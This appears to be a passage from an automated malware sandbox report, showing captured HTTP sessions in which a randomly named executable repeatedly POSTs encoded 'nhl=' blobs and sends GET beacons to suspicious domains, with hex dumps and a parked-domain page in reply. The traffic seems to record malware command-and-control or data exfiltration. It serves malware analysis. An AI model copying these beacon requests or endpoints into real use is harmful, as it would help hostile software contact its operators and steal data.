                                                                                                                                                                Data Ascii:
                                                                                                                                                                Oct 9, 2024 13:04:58.271025896 CEST253INData Raw: 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 31 32 38 2e 39 39 39 39 34 39 0d 0a 58 2d 58 53 53 2d 50 72 6f 74 65 63 74 69 6f 6e
                                                                                                                                                                Data Ascii: ax_age":604800}Server-Timing: cfRequestDuration;dur=128.999949X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer: cloudflareCF-RAY: 8cfde4931cc2c4


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                41192.168.11.304986284.32.84.32806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:03.731158972 CEST622OUTPOST /1jig/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.thepeatear.online
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.thepeatear.online
                                                                                                                                                                Referer: http://www.thepeatear.online/1jig/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 43 65 46 52 32 35 6d 44 77 4d 55 72 57 52 41 70 69 5a 37 6b 2f 46 5a 35 2f 47 52 48 6f 63 43 6b 45 51 32 6f 6c 66 6c 67 66 4d 58 4c 37 6f 78 63 34 37 64 47 52 32 72 49 66 70 78 52 2f 46 31 49 4e 63 67 32 39 52 2f 77 76 4f 4c 78 77 36 62 51 33 5a 34 6a 34 37 77 58 72 6b 65 41 72 59 74 4f 4e 6d 4c 58 5a 77 6b 6a 55 50 37 47 74 79 69 65 50 68 6e 6d 5a 41 45 39 31 32 77 7a 67 78 4a 6f 75 61 44 57 64 76 54 55 6e 44 4b 76 4d 79 51 63 53 74 51 46 71 73 6f 71 30 61 34 36 54 49 42 44 75 68 33 6b 4c 71 33 37 5a 48 4b 34 61 2f 65 4f 53 68 56 4a 53 61 43 66 38 66 57 61 4b 32 53 62 57 41 3d 3d
                                                                                                                                                                Data Ascii: nhl=CeFR25mDwMUrWRApiZ7k/FZ5/GRHocCkEQ2olflgfMXL7oxc47dGR2rIfpxR/F1INcg29R/wvOLxw6bQ3Z4j47wXrkeArYtONmLXZwkjUP7GtyiePhnmZAE912wzgxJouaDWdvTUnDKvMyQcStQFqsoq0a46TIBDuh3kLq37ZHK4a/eOShVJSaCf8fWaK2SbWA==


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                42192.168.11.304986384.32.84.32806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:06.366782904 CEST642OUTPOST /1jig/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.thepeatear.online
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.thepeatear.online
                                                                                                                                                                Referer: http://www.thepeatear.online/1jig/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 43 65 46 52 32 35 6d 44 77 4d 55 72 51 77 51 70 79 49 37 6b 76 56 5a 36 6a 32 52 48 68 38 43 6f 45 51 79 6f 6c 62 31 77 66 61 2f 4c 2b 38 35 63 37 36 64 47 51 32 72 49 4b 5a 78 55 67 31 31 35 4e 63 6b 49 39 56 2f 77 76 4f 50 78 77 37 48 51 33 70 45 67 34 72 77 56 67 45 65 43 76 59 74 4f 4e 6d 4c 58 5a 78 55 46 55 50 44 47 74 44 53 65 4d 44 66 6e 51 67 45 69 38 57 77 7a 6b 78 4a 30 75 61 43 7a 64 75 50 79 6e 42 79 76 4d 33 55 63 54 35 38 47 6c 73 6f 6f 71 61 35 2b 56 35 38 68 6f 68 2f 4e 46 35 58 34 57 6b 53 4e 57 49 76 55 50 69 68 4c 42 36 2b 79 67 65 37 79 49 30 54 41 4c 48 54 7a 6e 71 67 49 35 64 78 54 45 31 78 51 74 32 43 4a 51 70 41 3d
                                                                                                                                                                Data Ascii: nhl=CeFR25mDwMUrQwQpyI7kvVZ6j2RHh8CoEQyolb1wfa/L+85c76dGQ2rIKZxUg115NckI9V/wvOPxw7HQ3pEg4rwVgEeCvYtONmLXZxUFUPDGtDSeMDfnQgEi8WwzkxJ0uaCzduPynByvM3UcT58Glsooqa5+V58hoh/NF5X4WkSNWIvUPihLB6+yge7yI0TALHTznqgI5dxTE1xQt2CJQpA=


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                43192.168.11.304986484.32.84.32806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:09.004106998 CEST1289OUTPOST /1jig/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.thepeatear.online
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.thepeatear.online
                                                                                                                                                                Referer: http://www.thepeatear.online/1jig/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 43 65 46 52 32 35 6d 44 77 4d 55 72 51 77 51 70 79 49 37 6b 76 56 5a 36 6a 32 52 48 68 38 43 6f 45 51 79 6f 6c 62 31 77 66 61 33 4c 2b 72 35 63 37 5a 6c 47 43 6d 72 49 57 4a 78 56 67 31 31 6b 4e 64 41 55 39 55 44 67 76 4d 6e 78 79 5a 6a 51 2b 37 67 67 7a 72 77 56 76 6b 65 48 72 59 74 62 4e 6d 37 54 5a 77 6f 46 55 50 44 47 74 42 4b 65 62 42 6e 6e 57 67 45 39 31 32 77 76 67 78 4a 49 75 61 37 4f 64 74 6a 45 6e 48 6d 76 4e 45 73 63 53 4b 45 47 6c 73 6f 6f 31 61 35 46 56 35 78 47 6f 6c 54 5a 46 39 72 43 58 56 47 4e 56 2f 65 79 4b 68 64 4c 65 62 58 2f 69 2f 50 4c 65 57 54 77 4e 6e 4f 54 6e 72 59 50 38 63 6f 34 4a 31 41 45 35 45 32 69 45 2b 62 76 5a 67 55 4e 7a 6c 63 59 49 4c 4d 34 48 34 65 62 5a 68 43 35 79 4a 69 73 6e 65 63 52 2b 47 58 2f 50 64 44 44 2b 58 75 38 35 63 36 4e 75 35 59 6f 6b 51 52 39 52 68 2b 47 64 66 42 6d 62 4b 43 6e 4c 46 57 73 67 57 61 37 68 46 67 46 47 51 69 56 6f 55 30 67 57 6b 69 52 6b 68 4d 71 4e 79 6a 73 63 55 50 36 36 31 4c 43 32 34 32 6a 6a 6a 35 71 59 49 75 41 38 33 [TRUNCATED]
                                                                                                                                                                Data Ascii: nhl=CeFR25mDwMUrQwQpyI7kvVZ6j2RHh8CoEQyolb1wfa3L+r5c7ZlGCmrIWJxVg11kNdAU9UDgvMnxyZjQ+7ggzrwVvkeHrYtbNm7TZwoFUPDGtBKebBnnWgE912wvgxJIua7OdtjEnHmvNEscSKEGlsoo1a5FV5xGolTZF9rCXVGNV/eyKhdLebX/i/PLeWTwNnOTnrYP8co4J1AE5E2iE+bvZgUNzlcYILM4H4ebZhC5yJisnecR+GX/PdDD+Xu85c6Nu5YokQR9Rh+GdfBmbKCnLFWsgWa7hFgFGQiVoU0gWkiRkhMqNyjscUP661LC242jjj5qYIuA83cbn/95n8Zan4TkWun96RFQdtqxoUg7OfgxtGwgpi6T1jpdYEkENKC7vJ77eZ7Y9gncGFThR4jYuZ7umapo4/GkG7pP5iaFpoqwPlTkhA8r9j5X6enXVzq4rwVDlQo4ERs6oW485LK1B7GrUqvtHHFcKHYrt5tjnIxAEos34vHmoN6E2RihNMnrO3mIxGBKau1EU7DB4ibTdtwiVmeF58EVymu3qk9+x+G+a3TLzD+UWJL+OpDB/OqG7r1VqmVK6PZEEc+tAFnKO0slkkd0FqR4PkXuW+elOrmjEz3iRdXhjHUAMMyJI+4HzmP+GPNBEPlO5Yvk6Yv65oLJK0n5MfpXOX9eyQQsi1BZhrumPHUkCH8yw/heMFzXqs2oEc+IxrOgHMQkS8JrgSbEtPrYKgCoacL78yLBFlHSaD8R76Q8ExnRW9BbH6DaWp6iErmoYG6E2oa9JoRn0XFSfzG4ruqTGt6QjT5uM3WFlRIdXaOB7L7uocX4xHjDyCPzFYuWkZFY4xD2ZD/8CJFy6Z
                                                                                                                                                                Oct 9, 2024 13:05:09.004156113 CEST2470OUTData Raw: 62 4c 63 4e 6a 68 69 76 38 62 2b 68 53 49 72 74 50 4d 6b 68 46 4a 6d 72 42 68 4e 65 5a 4c 64 70 53 74 6d 31 31 47 70 44 6d 38 57 4a 33 49 51 6e 74 6e 34 49 6d 48 49 50 69 70 32 36 4f 70 56 39 7a 56 6d 33 76 57 44 63 56 33 62 73 39 6d 77 79 55 34
                                                                                                                                                                Data Ascii: bLcNjhiv8b+hSIrtPMkhFJmrBhNeZLdpStm11GpDm8WJ3IQntn4ImHIPip26OpV9zVm3vWDcV3bs9mwyU4O3bob/Klx1tCNV/oeu+q30d+0+otrwwiRxYzr+bgh0wFeU6Yde2pb6pKITfhxI0sf+S3b8TurdjYjxh050hFxsqMPDSkT/wugpSMRbJI5+8JerCydcQoVkAparYZkRF20me4e9ItAunnDnJ/Lxmk5f6ZltxIbzOUM


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                44192.168.11.304986584.32.84.32806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:11.646508932 CEST351OUTGET /1jig/?nhl=Pctx1PqJ8MApDnItio/Z+EFnrX0P+O6aDAf1ocJJBNfVobZUkvZZH3rRaqwxixVCcZIN7U7Xpqfz9fbsrPgf8JYUk12Pjtd3LjDyQQ9aa4jR42mhfhGkGD0=&9X=EvKH2xeP-DpP307P HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.thepeatear.online
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Oct 9, 2024 13:05:11.747112989 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                Server: hcdn
                                                                                                                                                                Date: Wed, 09 Oct 2024 11:05:11 GMT
                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                Content-Length: 10072
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                x-hcdn-request-id: dd44d0967ff34e926ebffc1b8f2b8889-bos-edge3
                                                                                                                                                                Expires: Wed, 09 Oct 2024 11:05:10 GMT
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;
                                                                                                                                                                Oct 9, 2024 13:05:11.747235060 CEST1289INData Raw: 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66
                                                                                                                                                                Data Ascii: margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:6
                                                                                                                                                                Oct 9, 2024 13:05:11.747361898 CEST1289INData Raw: 33 65 61 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74
                                                                                                                                                                Data Ascii: 3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;li
                                                                                                                                                                Oct 9, 2024 13:05:11.747375965 CEST1289INData Raw: 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78
                                                                                                                                                                Data Ascii: ize:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width
                                                                                                                                                                Oct 9, 2024 13:05:11.747483969 CEST1289INData Raw: 72 69 61 6c 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c
                                                                                                                                                                Data Ascii: rials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www
                                                                                                                                                                Oct 9, 2024 13:05:11.747498989 CEST1289INData Raw: 20 68 6f 73 74 69 6e 67 20 66 6f 72 20 79 6f 75 72 20 73 75 63 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72
                                                                                                                                                                Data Ascii: hosting for your successful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add w
                                                                                                                                                                Oct 9, 2024 13:05:11.747512102 CEST1289INData Raw: 5b 5d 2c 6e 3d 30 2c 74 3d 6f 2e 6c 65 6e 67 74 68 3b 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28
                                                                                                                                                                Data Ascii: [],n=0,t=o.length;n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join(""
                                                                                                                                                                Oct 9, 2024 13:05:11.747571945 CEST1289INData Raw: 69 63 65 28 66 2c 30 2c 61 29 2c 66 2b 2b 7d 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66
                                                                                                                                                                Data Ascii: ice(f,0,a),f++}if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf1
                                                                                                                                                                Oct 9, 2024 13:05:11.747582912 CEST100INData Raw: 2c 61 63 63 6f 75 6e 74 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28
                                                                                                                                                                Data Ascii: ,account=document.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                45192.168.11.304986654.67.42.145806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:17.149975061 CEST610OUTPOST /7cee/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.kx507981.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 200
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.kx507981.shop
                                                                                                                                                                Referer: http://www.kx507981.shop/7cee/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 47 4d 64 56 66 74 4b 74 4a 4e 37 7a 6a 5a 64 69 48 6a 59 73 53 32 46 73 45 6a 6c 50 6f 48 39 37 37 59 63 68 55 6b 68 37 47 72 57 6d 70 59 53 37 2b 66 33 6b 33 70 49 76 65 62 78 74 6c 47 68 4f 45 45 38 74 6b 4c 36 70 4e 36 64 52 4a 4b 33 36 50 78 50 2f 61 50 46 72 78 58 55 36 6a 45 47 74 7a 70 74 30 73 4d 69 30 7a 77 52 69 6f 66 6c 33 55 2b 4a 74 68 4a 44 75 33 35 70 70 69 6c 75 39 52 46 65 73 61 4f 79 31 4f 62 63 55 73 79 36 78 36 48 71 58 5a 64 39 68 62 59 33 52 67 4b 68 4e 48 51 67 6e 6b 6e 75 70 6a 55 70 57 39 67 66 36 4c 44 6d 59 6a 63 4d 4e 38 79 76 65 76 6f 2f 39 69 67 3d 3d
                                                                                                                                                                Data Ascii: nhl=GMdVftKtJN7zjZdiHjYsS2FsEjlPoH977YchUkh7GrWmpYS7+f3k3pIvebxtlGhOEE8tkL6pN6dRJK36PxP/aPFrxXU6jEGtzpt0sMi0zwRiofl3U+JthJDu35ppilu9RFesaOy1ObcUsy6x6HqXZd9hbY3RgKhNHQgnknupjUpW9gf6LDmYjcMN8yvevo/9ig==
                                                                                                                                                                Oct 9, 2024 13:05:17.304627895 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                content-type: text/plain
                                                                                                                                                                date: Wed, 09 Oct 2024 11:05:17 GMT
                                                                                                                                                                content-length: 0
                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                strict-transport-security: max-age=2592000
                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                expires: 631152000000
                                                                                                                                                                location: http://kx507945.shop


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                46192.168.11.304986754.67.42.145806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:19.835942030 CEST630OUTPOST /7cee/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.kx507981.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 220
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.kx507981.shop
                                                                                                                                                                Referer: http://www.kx507981.shop/7cee/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 47 4d 64 56 66 74 4b 74 4a 4e 37 7a 35 35 4e 69 43 43 59 73 55 57 46 76 4b 44 6c 50 78 33 38 54 37 59 51 68 55 6c 30 67 47 35 79 6d 6f 39 75 37 73 4b 58 6b 37 4a 49 76 51 37 78 6f 34 32 67 43 45 45 67 62 6b 4b 71 70 4e 36 4a 52 4a 4c 48 36 50 48 48 2b 49 76 46 70 35 33 55 34 73 6b 47 74 7a 70 74 30 73 4d 47 4b 7a 77 35 69 6f 76 56 33 56 66 4a 73 70 70 44 74 77 35 70 70 6d 6c 75 48 52 46 65 53 61 50 75 4d 4f 65 59 55 73 7a 71 78 72 32 71 55 43 74 39 6a 57 34 32 52 77 35 39 43 63 77 41 50 6a 6c 6e 36 36 30 31 68 78 58 75 67 57 41 53 61 77 38 77 67 67 7a 43 32 74 71 2b 6d 2f 6f 6e 32 6f 50 4b 4d 6a 61 74 30 32 2b 5a 53 49 75 52 53 67 77 34 3d
                                                                                                                                                                Data Ascii: nhl=GMdVftKtJN7z55NiCCYsUWFvKDlPx38T7YQhUl0gG5ymo9u7sKXk7JIvQ7xo42gCEEgbkKqpN6JRJLH6PHH+IvFp53U4skGtzpt0sMGKzw5iovV3VfJsppDtw5ppmluHRFeSaPuMOeYUszqxr2qUCt9jW42Rw59CcwAPjln6601hxXugWASaw8wggzC2tq+m/on2oPKMjat02+ZSIuRSgw4=
                                                                                                                                                                Oct 9, 2024 13:05:19.990580082 CEST296INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                content-type: text/plain
                                                                                                                                                                date: Wed, 09 Oct 2024 11:05:19 GMT
                                                                                                                                                                content-length: 0
                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                strict-transport-security: max-age=2592000
                                                                                                                                                                cache-control: no-cache, no-store, must-revalidate
                                                                                                                                                                expires: 631152000000
                                                                                                                                                                location: http://kx507945.shop


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                47192.168.11.304986854.67.42.145806156C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Oct 9, 2024 13:05:22.528934002 CEST1289OUTPOST /7cee/ HTTP/1.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                Host: www.kx507981.shop
                                                                                                                                                                Cache-Control: max-age=0
                                                                                                                                                                Content-Length: 3336
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Connection: close
                                                                                                                                                                Origin: http://www.kx507981.shop
                                                                                                                                                                Referer: http://www.kx507981.shop/7cee/
                                                                                                                                                                User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
                                                                                                                                                                Data Raw: 6e 68 6c 3d 47 4d 64 56 66 74 4b 74 4a 4e 37 7a 35 35 4e 69 43 43 59 73 55 57 46 76 4b 44 6c 50 78 33 38 54 37 59 51 68 55 6c 30 67 47 35 36 6d 6f 50 32 37 2b 37 58 6b 36 4a 49 76 4f 72 78 70 34 32 67 4c 45 45 35 53 6b 4b 6d 35 4e 2b 35 52 49 6f 66 36 4a 31 76 2b 52 66 46 70 31 58 55 35 6a 45 47 38 7a 70 39 72 73 4d 57 4b 7a 77 35 69 6f 74 4e 33 63 75 4a 73 6b 4a 44 75 33 35 70 75 69 6c 76 4a 52 46 48 71 61 50 71 63 4f 64 30 55 72 41 69 78 72 67 32 55 43 74 39 6a 63 59 32 55 77 35 78 42 63 77 59 62 6a 67 61 4e 36 6e 35 68 67 78 37 6c 4e 78 75 42 74 73 49 41 37 6a 61 69 36 4c 53 58 68 2f 7a 72 34 63 2b 51 6d 2b 78 34 74 65 4e 4b 52 75 49 58 38 51 36 75 2b 66 57 45 77 74 43 77 70 6f 68 54 66 4f 39 52 30 45 34 51 52 4d 46 4a 4c 57 31 7a 6e 4f 69 6f 58 68 59 74 51 42 49 45 77 62 57 57 55 66 77 54 6d 31 7a 54 70 75 45 32 4f 57 78 7a 74 35 2f 34 69 66 66 39 68 43 56 52 6f 6c 67 6b 4a 37 46 6f 4c 35 54 34 75 59 62 30 62 39 30 41 4f 4e 63 74 73 47 72 4d 44 46 6c 5a 61 52 2f 65 32 45 35 2f 42 6b 46 70 35 2b [TRUNCATED]
